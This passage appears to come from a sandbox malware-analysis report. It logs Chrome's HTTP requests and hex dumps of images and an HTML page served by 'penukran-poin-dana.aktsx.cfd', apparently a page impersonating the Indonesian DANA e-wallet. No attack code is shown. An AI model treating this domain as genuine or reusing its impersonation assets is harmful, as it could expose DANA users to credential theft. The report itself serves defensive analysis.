                                                                                                                            Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 68 00 00 00 c8 08 06 00 00 00 c5 8e 7b 8f 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 20 00 49 44 41 54 78 9c ed 9d 79 98 24 55 95 b7 df 13 99 b5 f6 de 74 b3 36 b2 36 3b 0a b4 cb 80 0a e2 82 88 88 c0 27 a8 e3 86 0b 38 2a 2e 28 e2 8a 36 33 32 22 6e e8 88 83 3a 2a ee 08 b8 cc e0 07 8a 62 a3 a8 0c 7e a0 80 ec cd d2 d0 74 d3 f4 de d5 4b 55 56 65 dc df f7 c7 8d e8 cc ca ce ca 8c cc ca da ef fb 3c f5 f4 52 11 37 4e dc b8 71 e2 dc 73 cf 39 17 02 81 40 20 10 08 04 02 81 40 20 10 08 04 02 81 40 20 10 08 04 02 81 40 20 10 08 04 02 81 40 20 10 08 04 02 81 40 20 10 08 04 02 81 40 20 10 08 04 02 81 40 20 10 08 04 02 81 00 80 8d b5 00 81 40 56 24 b5 03 5d c9 4f 3b d0 96 fc e4 80 88 d2 78 16 e0 80 18 18 48 7e 0a 40 1f d0 6b 66 fd a3 2b 79 20 d0 1c 41 41 07 c6 1d 92 0c af 74 f7 02 8e 04 0e 07 0e 03 76 06 66 00 d3 81 6e a0 03 e8 94 94 37 b3 48 52 ce cc 84 57 cc 0e 28 52 a6 98 81 cd 40 0f b0 0a b8 07 f8 47 5f 5f [TRUNCATED]
                                                                                                                            Data Ascii: PNGIHDRh{sRGBsBIT|d IDATxy$Ut66;'8*.(632"n:*b~tKUVe<R7Nqs9@ @ @ @ @ @ @ @ @V$]O;xH~@kf+y AAtvfn7HRW(R@G__Gf#I_w-Tt9VSn9wN5kf$@`L00fH^<8UR`6:S>o-[v>7*U$*1/3p-1Qt`T4x>pWl /1+0oG`B#)\x&sE137"&3Es$[1&x>*7lL&0bs=ln.1<Id}qL}[Y7l$6:Q$HUXMX{^dcjl@**vQ@~|X2"M$*~4O>zZxs7Iz:.IBUF~V$VIyOAt);Z3f*ilYo. J>027psn?I_4#p$%7J|\HP6K*V`#>BRw'r'vI]fv(#6
                                                                                                                            Oct 6, 2024 13:50:09.668044090 CEST224INData Raw: d9 53 23 78 9d 40 20 30 95 90 64 7d 7d 7d fb 49 fa 5b 32 6d 1f 0b fa 25 5d 21 9f 32 de cc 3d cc 96 f4 3d 49 03 6a bd 5b 26 2b 45 49 bf 97 b4 a0 d5 cf 28 10 08 4c 51 24 1d 25 bf 18 38 56 ca 39 a5 20 e9 3d 6a 70 d1 4d 52 bb a4 2f 39 e7 fa c7 56 7c
                                                                                                                            Data Ascii: S#x@ 0d}}}I[2m%]!2==Ij[&+EI(LQ$%8V9 =jpMR/9V|I^IV!#AaY<(F=<[1X]LL@\_/;<0`<"Lp_^rj<KjsOD7%2'!.v
                                                                                                                            Oct 6, 2024 13:50:09.668056011 CEST1236INData Raw: 07 be 61 66 8b 18 5a 39 0f 00 8f e3 f7 f9 1b 09 86 b2 d8 07 f0 e1 77 59 89 f0 a1 7a 77 82 9f 19 98 59 84 1f fb e9 26 b4 dd f8 88 8e d1 7e 1f 22 e0 85 92 be 26 e9 5d 66 b6 76 94 af 1f 18 e7 8c 97 69 6b 60 9c 20 1f 25 71 19 7e c7 93 5a 71 ce ab 81
                                                                                                                            Data Ascii: afZ9wYzwY&~"&]fvik` %q~Zq96l3g_,6T[kbxEWyXOwffi}BK7H_3L@,YQIVs$72hYtKZ?Z8*I:CzeX%DIK,OJ?NJ


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            8192.168.2.649750165.22.241.119806220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 6, 2024 13:50:07.342108965 CEST298OUTGET /asset/img/kom.png HTTP/1.1
                                                                                                                            Host: penukran-poin-dana.aktsx.cfd
                                                                                                                            Connection: keep-alive
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            Accept: */*
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Oct 6, 2024 13:50:08.756391048 CEST1236INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:08 GMT
                                                                                                                            Server: Apache
                                                                                                                            Last-Modified: Sun, 21 Apr 2024 03:10:27 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Content-Length: 8484
                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: image/png
                                                                                                                            Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c8 00 00 00 c8 08 06 00 00 00 ad 58 ae 9e 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 20 00 49 44 41 54 78 9c ed 9d 7b 94 25 75 75 ef bf bb ce e9 ee e9 79 0f c3 0c 6f e4 29 32 0a 0c 90 0b 78 81 18 41 34 e2 03 44 63 f0 c9 12 8d 88 57 4d 94 45 ae 17 91 c7 8d 9a 64 2d f5 e6 1a 0d 6a 6e 1e be a2 4c 04 d4 28 48 40 c6 84 a0 04 26 f2 90 19 90 01 5a 18 98 07 c3 34 dd 3d fd 3e 55 fb 7b ff a8 aa 9e 5f 57 57 9d 53 75 4e 9d 53 75 ba 7f 9f b5 66 cd e9 aa df 63 d7 af 7e bb 7e ef bd 01 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b 65 41 23 45 0b b0 10 98 98 98 38 a2 a7 a7 e7 35 95 4a e5 22 00 eb 01 ac 25 e9 88 48 bd f2 57 00 04 b0 0b c0 af 01 fc 0b 80 9f 88 c8 6f db 2f b1 c5 d2 26 48 9e a5 aa 0f 90 f4 d8 46 54 d5 23 79 3f c9 53 8b 7e 66 8b 25 11 92 2f 21 b9 91 a4 b6 53 21 52 a0 24 6f 1b 1b 1b 3b b8 e8 32 b1 [TRUNCATED]
                                                                                                                            Data Ascii: PNGIHDRXsRGBsBIT|d IDATx{%uuyo)2xA4DcWMEd-jnL(H@&Z4=>U{_WWSuNSufc~~bX,bX,bX,bX,bX,bX,bX,eA#E85J"%HWo/&HFT#y?S~f%/!S!R$o;2,p\BCI>@cx3.-LM/H&,/ZV!_<f#E-XIK-Kpl+Zc$V-Kp-HYqL`C9`QU}"cY"X@$DhJ)122ze-KY 9,"nmAH^l1Y`/-KXp-HhY]"rB^?YP-x9;88hYb(l5[Yjs)pvr#n-DBa'-G`3_xN;&&&tR~P8JUOve"xBG-G y|ydd`oW8LD}</N*Z )7,ZyCntrxY+<Zg-G(|lgu}ZVx$Vh;dtgk",%^OTj ){7a9]GrlI%)
                                                                                                                            Oct 6, 2024 13:50:08.756403923 CEST224INData Raw: 92 6f c9 e3 1d 96 95 79 31 48 57 d5 69 11 e9 29 5a 8e 14 0c 03 38 43 44 1e 6b 36 01 92 2b 54 f5 53 22 72 99 88 2c 43 09 de 21 c9 9a 88 9c 26 22 0f 16 2d 4b de 14 5e b8 ad a2 aa 5b 45 e4 98 a2 e5 68 c0 0b 00 8e 11 91 e1 66 22 4f 4e 4e 1e d7 d7 d7
                                                                                                                            Data Ascii: oy1HWi)Z8CDk6+TS"r,C!&"-K^[Ehf"ONNw3+w8vHEQ{||="BEWIr>4"hH3]}r$_pgMrA|AH_}bO_^ "
                                                                                                                            Oct 6, 2024 13:50:08.756417990 CEST1236INData Raw: b2 55 b0 54 90 7c 0d 80 3b 8a 96 c3 84 e4 2e c7 71 32 9d 69 27 b9 06 c0 73 00 ba 61 82 a1 19 d6 8b c8 43 45 0b d1 0a dd aa 20 8a f2 c8 4e 00 a7 8a c8 03 a9 23 90 87 00 f8 0d 80 25 6d 93 aa 1c a8 88 54 8a 16 a2 15 ba ae 29 27 79 0b ca a3 1c 4f 01
                                                                                                                            Data Ascii: UT|;.q2i'saCE N#%mT)'yOUUyxhR7V\PU_y1xM8a*InP?ZD&nDuq7-G3tK#"%"$/XzEVY.EfN);brq24C
                                                                                                                            Oct 6, 2024 13:50:08.756433010 CEST1236INData Raw: 32 76 f1 b6 2c 94 71 a6 64 34 8f 44 86 87 87 ff 20 7a cd f3 bc af a0 b8 ed 35 77 8a 48 8f 88 34 b4 b5 05 00 13 13 13 47 a8 ea 76 f8 d6 e4 bf 8a ee b1 f3 2b 22 72 6c 7f 7f ff 36 55 9d 20 79 6c 83 c0 83 9d 12 ac 19 4a a7 20 cd 78 84 8d c1 5d b9 72
                                                                                                                            Data Ascii: 2v,qd4D z5wH4Gv+"rl6U ylJ x]r|8By%-Zh@DjlmEDx7wFNA!D/,yQ@GK({ibu/bKienSDW/y7Tq%]#{w]BdWTI};\
                                                                                                                            Oct 6, 2024 13:50:08.756532907 CEST1236INData Raw: 9d 2d b1 f6 52 ab d5 ce ca f2 f0 a3 a3 a3 1d 9b b2 5e b0 90 1c 4c f1 2e 16 19 e1 a5 a9 aa bc 8f 7f 8b e4 3f d0 64 3a 9b 3b 5f 5a ed 87 e4 e7 52 3e 7f 43 c3 79 65 a5 2b ba 58 06 c7 a5 08 73 45 f8 43 44 c8 98 45 be 0c 44 f7 58 cd d9 a8 d8 08 92 9e
                                                                                                                            Data Ascii: -R^L.?d:;_ZR>Cye+XsECDEDXJ\N8mDDv "qe!"XFGGn!6KHW5+"I^344[`~A^W}t_jpmkfTu+||U\p;sUGk,6`2W
                                                                                                                            Oct 6, 2024 13:50:08.756546974 CEST1236INData Raw: 7c a9 5b ab 8d 1b 37 96 ce f6 af a5 e4 90 7c 47 4c 25 9b 22 79 b0 11 a6 5f 55 77 a5 ad 88 a4 df 05 22 b9 8d e4 ef 33 61 f6 2a 46 96 c3 e9 2b 4b bd 4a af 24 57 05 e1 ff 39 83 48 77 b6 ab 0c e7 3b 0b 7e 0b 42 50 81 7f 03 20 6a 9d e3 5e 00 67 07 bb
                                                                                                                            Data Ascii: |[7|GL%"y_Uw"3a*F+KJ$W9Hw;~BP j^gAT9}?;<Q9z]x;vX~{w8 cwZZ9_oU-xs)5w2F_[0qb^3Y$F=K}DWTu?b}PiqEUSm
                                                                                                                            Oct 6, 2024 13:50:08.756560087 CEST1236INData Raw: bb 85 fe a0 3a 0b c3 00 50 a9 54 46 13 ee cf 5c 67 93 5d cd a0 8c bf 15 fc 06 80 83 9a 49 07 00 44 24 34 88 27 00 b6 35 9b 4e 5a da e9 f9 74 3c fc 51 ad 56 a7 e3 02 90 1c 14 91 25 00 0e 12 91 5d 71 61 00 bf 35 02 10 b6 18 da db db 9b a9 79 8e e1
                                                                                                                            Data Ascii: :PTF\g]ID$4'5NZt<QV%]qa5y^ZDx3"cril?$dk!]MlDnZ@f=l0QZ\=hRO'dL6p?jU6F\m!#A'_7."F],68{H[I.N)$
                                                                                                                            Oct 6, 2024 13:50:08.756575108 CEST552INData Raw: 69 34 81 27 46 ee 39 46 57 83 3b 77 ee 4c 7c c9 24 7b 39 9b 5c cc ff 47 d2 5c 17 73 5f 49 8e c4 c5 0d ee 8f 18 f1 d7 44 9e eb 99 3a f1 06 8c 78 b1 83 4b 55 9d 59 98 ac 93 ce 59 41 90 cf d4 7f d2 99 f0 17 47 9e f9 c9 e0 fa 3b 48 72 64 64 64 ff 84
                                                                                                                            Data Ascii: i4'F9FW;wL|${9\G\s_ID:xKUYYAG;HrdddxvE\4FtlmG`7];A,Zl||WH"R'Eihy:_Apq)lIeM1[+V|sOWp)0zW
                                                                                                                            Oct 6, 2024 13:50:08.756588936 CEST552INData Raw: 69 34 81 27 46 ee 39 46 57 83 3b 77 ee 4c 7c c9 24 7b 39 9b 5c cc ff 47 d2 5c 17 73 5f 49 8e c4 c5 0d ee 8f 18 f1 d7 44 9e eb 99 3a f1 06 8c 78 b1 83 4b 55 9d 59 98 ac 93 ce 59 41 90 cf d4 7f d2 99 f0 17 47 9e f9 c9 e0 fa 3b 48 72 64 64 64 ff 84
                                                                                                                            Data Ascii: i4'F9FW;wL|${9\G\s_ID:xKUYYAG;HrdddxvE\4FtlmG`7];A,Zl||WH"R'Eihy:_Apq)lIeM1[+V|sOWp)0zW
                                                                                                                            Oct 6, 2024 13:50:08.756603003 CEST535INData Raw: d8 37 1d 39 96 54 c1 e3 20 59 09 5e 4c 15 00 a6 a6 a6 8e 89 33 86 10 84 3d 3c f8 59 b7 bb 04 00 93 93 93 33 dd c7 a4 a9 e1 08 e6 00 7e ce 2e e7 20 ff 34 d3 d9 61 4b d5 d4 46 3d 11 79 39 c9 99 c5 d2 f1 f1 f1 a4 ba 60 4e 23 37 5d 5f 44 e4 36 55 0d
                                                                                                                            Data Ascii: 79T Y^L3=<Y3~. 4aKF=y9`N#7]_D6U^/"9>'''W/U)c2aTLUIZF0;55jZ{NFUS ?&m$9666g?ZpDC4$167}7+$dl$<8~s$#
                                                                                                                            Oct 6, 2024 13:50:08.756639957 CEST1236INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:08 GMT
                                                                                                                            Server: Apache
                                                                                                                            Last-Modified: Sun, 21 Apr 2024 03:10:27 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Content-Length: 8484
                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: image/png
                                                                                                                            Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c8 00 00 00 c8 08 06 00 00 00 ad 58 ae 9e 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 20 00 49 44 41 54 78 9c ed 9d 7b 94 25 75 75 ef bf bb ce e9 ee e9 79 0f c3 0c 6f e4 29 32 0a 0c 90 0b 78 81 18 41 34 e2 03 44 63 f0 c9 12 8d 88 57 4d 94 45 ae 17 91 c7 8d 9a 64 2d f5 e6 1a 0d 6a 6e 1e be a2 4c 04 d4 28 48 40 c6 84 a0 04 26 f2 90 19 90 01 5a 18 98 07 c3 34 dd 3d fd 3e 55 fb 7b ff a8 aa 9e 5f 57 57 9d 53 75 4e 9d 53 75 ba 7f 9f b5 66 cd e9 aa df 63 d7 af 7e bb 7e ef bd 01 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b 65 41 23 45 0b b0 10 98 98 98 38 a2 a7 a7 e7 35 95 4a e5 22 00 eb 01 ac 25 e9 88 48 bd f2 57 00 04 b0 0b c0 af 01 fc 0b 80 9f 88 c8 6f db 2f b1 c5 d2 26 48 9e a5 aa 0f 90 f4 d8 46 54 d5 23 79 3f c9 53 8b 7e 66 8b 25 11 92 2f 21 b9 91 a4 b6 53 21 52 a0 24 6f 1b 1b 1b 3b b8 e8 32 b1 [TRUNCATED]
                                                                                                                            Data Ascii: PNGIHDRXsRGBsBIT|d IDATx{%uuyo)2xA4DcWMEd-jnL(H@&Z4=>U{_WWSuNSufc~~bX,bX,bX,bX,bX,bX,bX,eA#E85J"%HWo/&HFT#y?S~f%/!S!R$o;2,p\BCI>@cx3.-LM/H&,/ZV!_<f#E-XIK-Kpl+Zc$V-Kp-HYqL`C9`QU}"cY"X@$DhJ)122ze-KY 9,"nmAH^l1Y`/-KXp-HhY]"rB^?YP-x9;88hYb(l5[Yjs)pvr#n-DBa'-G`3_xN;&&&tR~P8JUOve"xBG-G y|ydd`oW8LD}</N*Z )7,ZyCntrxY+<Zg-G(|lgu}ZVx$Vh;dtgk",%^OTj ){7a9]GrlI%)
                                                                                                                            Oct 6, 2024 13:50:09.342339039 CEST299OUTGET /asset/img/hero.svg HTTP/1.1
                                                                                                                            Host: penukran-poin-dana.aktsx.cfd
                                                                                                                            Connection: keep-alive
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            Accept: */*
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Oct 6, 2024 13:50:09.676305056 CEST1236INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:09 GMT
                                                                                                                            Server: Apache
                                                                                                                            Last-Modified: Sun, 21 Apr 2024 03:10:27 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Content-Length: 31697
                                                                                                                            Keep-Alive: timeout=5, max=99
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: image/svg+xml
                                                                                                                            Data Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 36 30 30 22 20 68 65 69 67 68 74 3d 22 35 32 37 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 3e 3c 64 65 66 73 3e 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 78 31 3d 22 35 30 25 22 20 79 31 3d 22 30 25 22 20 78 32 3d 22 35 30 25 22 20 79 32 3d 22 31 30 30 25 22 20 69 64 3d 22 64 22 3e 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 44 32 46 31 46 46 22 20 6f 66 66 73 65 74 3d 22 30 25 22 2f 3e 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 41 36 44 45 46 46 22 20 6f 66 66 73 65 74 3d 22 31 30 30 25 22 2f 3e 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 78 31 3d 22 35 30 25 22 20 79 31 3d 22 30 25 22 20 78 32 3d 22 35 30 25 22 20 79 32 3d 22 31 30 30 25 22 20 69 64 3d 22 65 22 3e 3c 73 74 6f 70 20 73 [TRUNCATED]
                                                                                                                            Data Ascii: <svg width="600" height="527" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><defs><linearGradient x1="50%" y1="0%" x2="50%" y2="100%" id="d"><stop stop-color="#D2F1FF" offset="0%"/><stop stop-color="#A6DEFF" offset="100%"/></linearGradient><linearGradient x1="50%" y1="0%" x2="50%" y2="100%" id="e"><stop stop-color="#F9FDFF" offset="0%"/><stop stop-color="#D9EFFF" offset="100%"/></linearGradient><linearGradient x1="32.791%" y1="0%" x2="50%" y2="100%" id="g"><stop stop-color="#BDCCFF" offset="0%"/><stop stop-color="#108EE9" offset="100%"/></linearGradient><linearGradient x1="8.191%" y1="47.527%" x2="102.093%" y2="27.162%" id="i"><stop stop-color="red" offset="0%"/><stop stop-color="#B91E1E" offset="17.311%"/><stop stop-color="red" offset="56.406%"/><stop stop-color="#B02222" offset="69.081%"/><stop stop-color="red" offset="100%"/></linearGradient><linearGradient x1="4.347%" y1="58.377%" x2="94.209%" y2="32.155%" id="j"><stop stop-color="#FFF" of
                                                                                                                            Oct 6, 2024 13:50:09.676320076 CEST1236INData Raw: 66 73 65 74 3d 22 30 25 22 2f 3e 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 46 46 44 39 44 39 22 20 6f 66 66 73 65 74 3d 22 32 31 2e 32 37 31 25 22 2f 3e 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 46 46 46 43 46 43 22
                                                                                                                            Data Ascii: fset="0%"/><stop stop-color="#FFD9D9" offset="21.271%"/><stop stop-color="#FFFCFC" offset="68.089%"/><stop stop-color="#FFE6E6" offset="79.25%"/><stop stop-color="#FFF" offset="100%"/></linearGradient><linearGradient x1="84.572%" y1="43.528%"


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            9192.168.2.649766165.22.241.119806220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 6, 2024 13:50:09.504945993 CEST304OUTGET /asset/img/load_spin.png HTTP/1.1
                                                                                                                            Host: penukran-poin-dana.aktsx.cfd
                                                                                                                            Connection: keep-alive
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            Accept: */*
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Oct 6, 2024 13:50:10.237008095 CEST1236INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:10 GMT
                                                                                                                            Server: Apache
                                                                                                                            Last-Modified: Sun, 21 Apr 2024 03:10:27 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Content-Length: 5078
                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: image/png
                                                                                                                            Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c8 00 00 00 c8 08 04 00 00 00 07 51 66 15 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 02 62 4b 47 44 00 ff 87 8f cc bf 00 00 00 07 74 49 4d 45 07 e6 0b 01 06 0c 06 82 fe 92 c0 00 00 12 aa 49 44 41 54 78 da ed 9d f9 7b 14 d7 95 86 df 5a 7a 51 ab b5 81 5a 3b 20 c9 80 43 8c 6d c6 78 89 6d 12 1b 18 2f f3 78 e6 c9 3f 3b 36 4e 66 1c c7 4e e2 cc 04 c6 76 12 b0 8d 6d 04 02 24 a1 0d 21 a9 5b ea 56 57 57 cd 0f 75 fb f6 ad d6 d6 6b 55 83 ee a7 07 d1 dd 52 dd 7b ce f9 74 ce b9 e7 2e 55 06 4f 01 bc bd 3e 34 b0 30 b1 88 11 27 8e 01 38 94 28 52 c0 a1 b4 df 25 9d 8f 0e 96 b1 ca a6 49 06 18 24 c3 71 fa e8 a5 87 14 5d 24 48 08 42 a0 c4 0e 45 b6 c9 b2 49 96 4d 36 e5 ff 1b 6c b0 4d e9 e9 50 bb e3 24 ab a2 21 c5 30 53 9c e5 17 4c 33 46 3f 49 2c c0 c5 a3 44 89 12 2e 8e 7c 55 c2 55 be 3b 94 70 d8 a1 40 8e 27 2c f1 90 47 2c [TRUNCATED]
                                                                                                                            Data Ascii: PNGIHDRQfgAMAa cHRMz&u0`:pQ<bKGDtIMEIDATx{ZzQZ; Cmxm/x?;6NfNvm$![VWWukUR{t.UO>40'8(R%I$q]$HBEIM6lMP$!0SL3F?I,D.|UU;p@',G,BA(TXgyLs0pI1^x8bep;!BE)^IN{p|bs0*N2m*p"$101(aV00`bfL[<\\ 0^`924YL@8&1Epq%lerE)H&I66>e;2L$*d:WB-a[se"%*$F.c12?<6g8)Hp\P*q,\,#?3Fp[ 0cd!:X,l4YW`M3knjxM>5`c6s|9i5>E['<3||ZEM7#<XXGPQ<u><)/byfLa_mC*+|y ?-!E-iyQRG*uKGe:-YJ1jf>N0I*/W6.U=\S[|-!Rc-.yG
                                                                                                                            Oct 6, 2024 13:50:10.237039089 CEST1236INData Raw: ad 65 a1 62 8a cb bc c7 a0 f4 0c 7f 24 95 e5 3a 9f 72 93 9d 76 ab d7 90 cc 60 33 cc 69 46 b1 03 15 8b cb 06 f7 78 e4 07 af 76 c9 dc 96 76 a5 62 93 fc 07 2f 12 0b 78 46 8e af f9 84 ef a3 1a e7 d7 2c bb c9 10 67 18 c2 0a e4 14 87 25 ee 91 6d 9f ec
                                                                                                                            Data Ascii: eb$:rv`3iFxvvb/xF,g%mmhSmJqS,fH~A9^(UC!1\nEQl5EiWvh1.rmlxQ]+-!Wx1/xC$%Cb'YZ
                                                                                                                            Oct 6, 2024 13:50:10.237052917 CEST1236INData Raw: 09 49 0a 06 0c 4a ac 47 2d de d1 83 42 88 98 70 af d4 e7 5b 7a 23 5c f8 a8 f6 90 b8 dc 2a ea b1 a9 37 33 84 8f 6a 42 12 32 60 39 e5 fb 0b 6a 84 09 49 88 08 58 95 84 be 45 51 fb 47 f8 08 7a 88 1a b0 b2 8d 6d 85 d4 68 0e 41 42 2a 09 7d 47 4f b8 47
                                                                                                                            Data Ascii: IJG-Bp[z#\*73jB2`9jIXEQGzmhAB*}GOGAO~DC`G*!UBp-:G9;5<TBp(*OliF(b)XS)rr5!Q!B LH%~F{Q~o%,o h1
                                                                                                                            Oct 6, 2024 13:50:10.237083912 CEST1236INData Raw: 34 50 e4 5b e6 95 be ce 73 d9 17 e6 e8 51 22 53 f9 f1 c0 c6 74 c7 3f 8b 56 ff d8 b7 6e 42 44 17 db dc 60 51 e9 ef 1c ef d3 a7 08 78 44 20 07 ba 19 ba 15 e5 1d f2 8d 1a a2 01 0f 11 2c 6c f2 3f ca 94 a3 c7 59 fe 9d 21 45 c8 23 00 a1 69 17 a3 01 ef
                                                                                                                            Data Ascii: 4P[sQ"St?VnBD`QxD ,l?Y!E#i(?P=xT}!L3JR1"h^5B0g_?6[U]_%bcaa#hNN\dmw4weEo2qAu>g;2p%\\
                                                                                                                            Oct 6, 2024 13:50:10.237098932 CEST377INData Raw: 02 0a 2d 49 4e 72 91 d7 78 89 69 86 e8 c6 7f e8 a5 b3 87 61 eb 7b 55 c2 c3 c5 a5 c8 36 eb 2c 72 9f 07 2c b2 de 39 54 74 92 14 02 81 51 51 9a 11 a6 f8 25 2f 71 96 31 fa 89 83 4c c5 ce be 7f fd c1 57 ae f4 06 87 3c 1b 2c 32 c7 1c f3 ac 90 55 9e db
                                                                                                                            Data Ascii: -INrxia{U6,r,9TtQQ%/q1LW<,2UQF$Y$0)9H"IC7|QH<l%x:TNIbWaC7]8F7q\8%:[kmGpt.iQisLZL%tEXtdate:create2022-10-


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            10192.168.2.649899165.22.241.119806220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Oct 6, 2024 13:50:31.291290998 CEST443OUTGET / HTTP/1.1
                                                                                                                            Host: penukran-poin-dana.aktsx.cfd
                                                                                                                            Connection: keep-alive
                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Oct 6, 2024 13:50:32.194169998 CEST1236INHTTP/1.1 200 OK
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:32 GMT
                                                                                                                            Server: Apache
                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                            Data Raw: 32 30 30 30 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 69 64 22 3e 0a 3c 21 2d 2d 20 48 54 4d 4c 20 4d 65 74 61 20 54 61 67 73 20 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 31 38 45 45 41 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 74 69 74 6c 65 3e f0 9d 97 97 f0 9d 97 94 f0 9d 97 a1 f0 9d 97 94 20 7c 20 f0 9d 97 96 f0 9d 98 82 f0 9d 98 80 f0 9d 98 81 f0 9d [TRUNCATED]
